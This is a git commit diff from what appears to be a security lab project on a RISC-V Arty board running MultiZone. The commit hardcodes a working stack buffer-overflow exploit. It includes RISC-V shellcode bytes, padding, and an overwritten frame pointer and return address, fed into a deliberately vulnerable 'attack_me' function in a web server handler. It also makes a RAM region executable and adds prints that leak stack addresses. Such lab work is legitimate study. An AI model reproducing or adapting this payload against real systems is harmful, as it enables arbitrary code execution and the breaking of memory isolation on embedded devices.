working arty attack impl hardcoded

10b2aaee · fptk · 7384d380 · 10b2aaee · 10b2aaee · 10b2aaee
Commit 10b2aaee authored Feb 21, 2021 by fptk
--- a/ArtyImplementation/bsp/X300/multizone.cfg
+++ b/ArtyImplementation/bsp/X300/multizone.cfg
@@ -7,7 +7,7 @@ Tick = 10 # ms
 Zone = 1
 	plic = 21 # ETHERNET 
 	base = 0x20440000; size =     128K; rwx = rwx # FLASH 
-	base = 0x80001800; size =      38K; rwx = rw # RAM
+	base = 0x80001800; size =      38K; rwx = rwx # RAM
 	base = 0x8000B000; size =       2K; rwx = w  # SH BUFF1
 	base = 0x8000B800; size =       8K; rwx = w  # SH BUFF2
 	base = 0x60000000; size =   0x2000; rwx = rw # XEMACLITE

--- a/ArtyImplementation/payload_arty.as
+++ b/ArtyImplementation/payload_arty.as
+.text
+    li a0, 0x2044b37c
+    li t3, 0x204408f8
+    jalr t4, t3
--- a/ArtyImplementation/zone1/message_handling.h
+++ b/ArtyImplementation/zone1/message_handling.h
@@ -5,9 +5,9 @@
 #include "multizone.h"
 #define printf2(format, args...) { /* Multi-part printf()  */\
-	char *str = malloc(64);									 \
+	char *str = malloc(128);									 \
 	if (str != NULL){										 \
-		const int len = snprintf(str, 64, format, ## args);	 \
+		const int len = snprintf(str, 128, format, ## args);	 \
 		for (int i=0; i<(len/16)+1; i++){					 \
 			while(!MZONE_SEND(2, (str+16*i))) MZONE_YIELD(); \
 		}													 \

--- a/ArtyImplementation/zone1/server_utility.h
+++ b/ArtyImplementation/zone1/server_utility.h
@@ -43,9 +43,10 @@ char *attack_me(char *data, uint32_t data_len) {
 	// nobody could possibly enter a name longer than 20 characters, so this buffer
 	// is definitely large enough
 	char message[128];
-	//for debugging purpose
+	printf2("CD: 0x%08x ", ((uint32_t*)(&message[8])));
-	printf2("Framepointer: 0x%x\n", *(uint32_t *)&message[140]);
+	printf2("F-: 0x%08x ", *((uint32_t*)(&message[136])));
-	printf2("Rücksprungadresse: 0x%x\n", *(uint32_t *)&message[140] - 204);
+	printf2("RA: 0x%08x ", *((uint32_t*)(&message[140])));
+	printf2("FP: 0x%08x ", *((uint32_t*)(&message[156])));
 	memset(message, 'B', sizeof(message));
 	memcpy(message, "Hallo, ", 7);
@@ -70,13 +71,54 @@ char *server_request_handler(char *location, enum request_type type, char *data,
 		if(data_len >= 5 && strncmp(data, "name=", 5) == 0) {
 			uint32_t name_len = data_len - 5;
 			name_len = webserver_percent_decode(&data[5], name_len);
+			data =    "X" // padding to align the instructions
+			          "\x37\xb5\x44\x20" // 0: lui a0,0x2044b
+			          "\x13\x05\xc5\x37" // 4: addi a0,a0,892 # 0x2044b37c
+			          "\x37\x1e\x44\x20" // 8: lui t3,0x20441
+			          "\x13\x0e\x8e\x8f" // c: addi t3,t3,-1800 # 0x204408f8
+			          "\xe7\x0e\x0e\x00" // 10: jalr t4,t3
+					          "XXXX" // padding to overwrite the return address
+					          "XXXX" // padding to overwrite the return address
+					          "XXXX" // padding to overwrite the return address
+					          "XXXX" // padding to overwrite the return address
+					          "XXXX" // padding to overwrite the return address
+					          "XXXX" // padding to overwrite the return address
+					          "XXXX" // padding to overwrite the return address
+					          "XXXX" // padding to overwrite the return address
+					          "XXXX" // padding to overwrite the return address
+					          "XXXX" // padding to overwrite the return address
+					          "XXXX" // padding to overwrite the return address
+					          "XXXX" // padding to overwrite the return address
+					          "XXXX" // padding to overwrite the return address
+					          "XXXX" // padding to overwrite the return address
+					          "XXXX" // padding to overwrite the return address
+					          "XXXX" // padding to overwrite the return address
+					          "XXXX" // padding to overwrite the return address
+					          "XXXX" // padding to overwrite the return address
+					          "XXXX" // padding to overwrite the return address
+					          "XXXX" // padding to overwrite the return address
+					          "XXXX" // padding to overwrite the return address
+					          "XXXX" // padding to overwrite the return address
+					          "XXXX" // padding to overwrite the return address
+					          "XXXX" // padding to overwrite the return address
+					          "XXXX" // padding to overwrite the return address
+					          "XXXX" // padding to overwrite the return address
+			          "XXXX" // padding to overwrite the return address
+			          "\x2c\x69\x00\x80" // the new frame pointer: 0x80004ba2
+			          "\x78\x68\x00\x80"; // the new return address: 0x80006870
 			// nobody could possibly enter a name longer than 20 characters, so this buffer
 			// is definitely large enough
 			char *return_string;
-			return_string = attack_me(&data[5], name_len);
+			//return_string = attack_me(&data[5], name_len);
+			return_string = attack_me(data, 137);
 			char* response = http_prepare_response(return_string, strlen(return_string), 200, out_len);
-			free(return_string);
+			//free(return_string);
 			return response;
 		} else {
 			return http_prepare_response(RESPONSE_404, strlen(RESPONSE_404), 404, out_len);